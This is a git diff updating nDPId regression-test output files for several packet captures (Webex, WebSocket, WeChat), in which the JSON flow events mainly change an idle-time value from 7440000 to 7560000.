+00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1444570636364,"flow_last_seen":1444570640403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":6215,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640310,"flow_last_seen":1444570645707,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37139,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1444570699916,"flow_last_seen":1444570700460,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1444570700561,"flow_last_seen":1444570713719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1375,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1444570700563,"flow_last_seen":1444570713710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":980,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1444570713719,"flow_last_seen":1444570715293,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1011,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570636170,"flow_last_seen":1444570639257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7020,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00923{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1444570636252,"flow_last_seen":1444570640344,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2842,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640269,"flow_last_seen":1444570645699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1444570699074,"flow_last_seen":1444570740247,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7928,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":1444570624853,"flow_last_seen":1444570630376,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17680,"flow_tot_l4_payload_len":87086,"flow_avg_l4_payload_len":916,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":56,"flow_first_seen":1444570627404,"flow_last_seen":1444570630162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17966,"flow_tot_l4_payload_len":106652,"flow_avg_l4_payload_len":1904,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570628113,"flow_last_seen":1444570628619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1444570628117,"flow_last_seen":1444570628568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1444570631722,"flow_last_seen":1444570633204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8394,"flow_tot_l4_payload_len":24960,"flow_avg_l4_payload_len":960,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00923{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1444570633357,"flow_last_seen":1444570635974,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8847,"flow_tot_l4_payload_len":40410,"flow_avg_l4_payload_len":1063,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
+00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636387,"flow_last_seen":1444570640346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":7463,"flow_avg_l4_payload_len":439,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640319,"flow_last_seen":1444570652361,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570672215,"flow_last_seen":1444570673280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":7463,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","packets-captured":1580,"packets-processed":1580,"total-skipped-flows":0,"total-l4-data-len":778771,"total-not-detected-flows":0,"total-guessed-flows":5,"total-detected-flows":52,"total-detection-updates":38,"total-updates":0,"current-active-flows":0,"total-active-flows":57,"total-idle-flows":57,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":383,"global_ts_msec":1444570742172} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1580/1580 diff --git a/test/results/websocket.pcap.out b/test/results/websocket.pcap.out index b7c1d54dc..b1ebf3bdf 100644 --- a/test/results/websocket.pcap.out +++ b/test/results/websocket.pcap.out 
@@ -1,11 +1,11 @@ 00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"websocket.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1475155931028} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1475155931028,"flow_last_seen":1475155931028,"flow_idle_time":7440000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1475155931028,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1475155931028,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1475155931028,"pkt":"AFBWwAAIAAwpij2nCABFAABB27JAAEAGhyvAqCuHwKgrATA5xzc8ilRnydSxV1AYAO1IlQAAgRdXZWxjb21lLCAxOTIuMTY4LjQzLjEgIQ=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1475155931028,"flow_last_seen":1475155931028,"flow_idle_time":7440000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1475155931028,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WebSocket","breed":"Acceptable","category":"Web"}} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1475155946892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1475155946892,"pkt":"AAwpij2nAFBWwAAICABFAAA6BcdAAEAGXR7AqCsBwKgrh8c3MDnJ1LFXPIpUgFAYP+\/mwAAAgYzhfo65lRv9zcET68qSH+nc"} 
-00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1475155946903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1475155946903,"pkt":"AFBWwAAIAAwpij2nCABFAABc27NAAEAGhw\/AqCuHwKgrATA5xzc8ilSAydSxaVAYAO0tVgAAgTIyMTozMzo1MiAoJzE5Mi4xNjguNDMuMScsIDUwOTk5KSBzYXk6IHRlc3QgbWVzc2FnZQ=="} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1475155931028,"flow_last_seen":1475156008657,"flow_idle_time":7440000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":34,"midstream":1,"thread_ts_msec":1475156008657,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WebSocket","breed":"Acceptable","category":"Web"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1475155931028,"flow_last_seen":1475155931028,"flow_idle_time":7560000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1475155931028,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1475155931028,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1475155931028,"pkt":"AFBWwAAIAAwpij2nCABFAABB27JAAEAGhyvAqCuHwKgrATA5xzc8ilRnydSxV1AYAO1IlQAAgRdXZWxjb21lLCAxOTIuMTY4LjQzLjEgIQ=="} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1475155931028,"flow_last_seen":1475155931028,"flow_idle_time":7560000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1475155931028,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WebSocket","breed":"Acceptable","category":"Web"}} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1475155946892,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1475155946892,"pkt":"AAwpij2nAFBWwAAICABFAAA6BcdAAEAGXR7AqCsBwKgrh8c3MDnJ1LFXPIpUgFAYP+\/mwAAAgYzhfo65lRv9zcET68qSH+nc"} 
+00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1475155946903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1475155946903,"pkt":"AFBWwAAIAAwpij2nCABFAABc27NAAEAGhw\/AqCuHwKgrATA5xzc8ilSAydSxaVAYAO0tVgAAgTIyMTozMzo1MiAoJzE5Mi4xNjguNDMuMScsIDUwOTk5KSBzYXk6IHRlc3QgbWVzc2FnZQ=="} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1475155931028,"flow_last_seen":1475156008657,"flow_idle_time":7560000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":34,"midstream":1,"thread_ts_msec":1475156008657,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WebSocket","breed":"Acceptable","category":"Web"}} 00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5,"source":"websocket.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":5,"total-skipped-flows":0,"total-l4-data-len":171,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1475156008657} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5/5 diff --git a/test/results/wechat.pcap.out b/test/results/wechat.pcap.out index 76c70b1ec..c1c929a42 100644 
--- a/test/results/wechat.pcap.out +++ b/test/results/wechat.pcap.out 
@@ -1,8 +1,8 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"wechat.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"wechat.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1492167337792} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167337792,"flow_last_seen":1492167337792,"flow_idle_time":7440000,"flow_min_l4_payload_len":604,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":604,"midstream":1,"thread_ts_msec":1492167337792,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01281{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1492167337792,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":670,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":670,"pkt_l4_len":636,"thread_ts_msec":1492167337792,"pkt":"eJKcD6iO8IQvSpdgCABFoAKQLFpAACwG+e7LzZeiwKgBZwG700RsJQvmFiW5B4AYAQBhCAAAAQEICkXRlQMAMKrIjxNPGb1b2gIOFmmrodrIUGWpRD8pBe\/eyANOuHxnf1oEiCDKQxkU6yvgqiltC85O1YOlf4+boaZn\/v7U0TkR+lQ9a8XEdMtbUDNvRkN1lpLANNJe9T6WEXQRZhhQATyvHXIsPxznFQlv1ayF4fN0Lp1Tv+DnMtPovG4l64Fdnf94BKNh3wpUis\/1aaAJUl4N4QYAa2BN+MLHUIjBfzQomk58kbDVZlQvabo4eeiFrJQbG0CRtmIDLIV4UlMABwm2B+L0SD\/lX+vPdRjlbT0hOePKWkrPVp4oa0GnGMtovp\/3dKKj2adHC1yCvZqzc+T4heafDFJJDxNGnnTZtJeXWQW2\/Wn0xAXZa5xeVmiob7mVi7gQwqB4EyVdzoi+MdLqv1I0FdZ7WKuu9o+r6i7T5KxQ7NhUIRC9KEInuscbFfTp5tcTpkg81VRtJhveR07GYTrLSFchnUCEzbFpCOPEOlfHshGkgemcZqUW0JSeBZoVIhGHuP8IElk+zTdckKSFR7XZosRv+JZpXULghhsYEQIcWSnXEwiNwHqD7SkijDTYTSRARplFy3lQ+I9PYai9e3wxDdj38dt3ZjnYHW+Jgcvyxa81TfaFhCzMBo8JWYVcQLLQCzJJ7po8hcjxwSKSvs1BzLjoAmGIOQCY3cD2niwBo4mLwkfrwM7iYYbbTgCByxdl2XUzXKGTmMiV+yqiF1sadTUF0KDk8zQPlxqASeejWTULCaKDKO7zq0WMvrWWgtPS5+WycvqXy24tfwXRN6su4lzlC8cmzA\/wzbACdxOu6m0puRk6CDMzrA=="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1492167337792,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167337792,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0B7NAAEAGDZLAqAFny82XotNEAbsWJbkHbCUOQoAQAk6qQAAAAQEICgAwqxZF0ZUD"} 
